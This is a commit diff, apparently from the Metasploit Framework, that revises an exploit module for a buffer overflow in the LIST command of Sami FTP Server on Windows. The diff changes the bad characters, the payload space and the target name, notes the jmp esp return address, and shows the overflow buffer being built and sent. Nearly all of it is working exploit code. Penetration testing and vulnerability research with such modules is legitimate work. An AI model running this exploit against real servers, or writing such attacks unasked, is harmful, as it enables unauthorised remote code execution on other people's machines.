made recommended changes

Author: dougsko

modules/exploits/windows/ftp/sami_ftpd_list.rb

@@ -8,7 +8,7 @@
 require 'msf/core'
 
 class Metasploit4 < Msf::Exploit::Remote
-	Rank = AverageRanking
+	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::Ftp
 
@@ -31,43 +31,35 @@ def initialize(info = {})
 					[ 'OSVDB', '90815'],
 					[ 'EDB', '24557'],
 				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'seh',
-					'target' => 0
-				},
 			'Privileged'	 => false,
 			'Payload'		 =>
 				{
-					'Space'    => 900,
-					'BadChars' => "\x00~+&=%\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x09",
+					'Space'    => 955,
+					'BadChars' => "\x00\x0a\x0d\x20\xff",
 					'StackAdjustment' => -3500,
 				},
 			'Targets'		 =>
 				[
 					[
-						'Windows XP English SP3',
+						'Windows Universal',
 						{
 							'Platform' => 'win',
-							'Ret' => 0x10028283,
+							'Ret' => 0x10028283, # jmp esp C:\Program Files\PMSystem\Temp\tmp0.dll
 							'Offset'   => 219,
 						},
 					],
 				],
+			'DefaultTarget' => 0,
 			'DisclosureDate' => 'Feb 27 2013'))
 	end
 
 	def exploit
-		connect
-
-		print_status("Trying target #{target.name}...")
+		connect_login
 
-		buf = rand_text_english(target['Offset'], payload_badchars)
+		buf = rand_text(target['Offset'], payload_badchars)
 		buf << [ target['Ret'] ].pack('V')
 		buf << payload.encoded
 
-		send_cmd( ['USER', datastore['FTPUSER']] , false )
-		send_cmd( ['PASS', datastore['FTPPASS']], false )
 		send_cmd( ['LIST', buf], false )
 
 		handler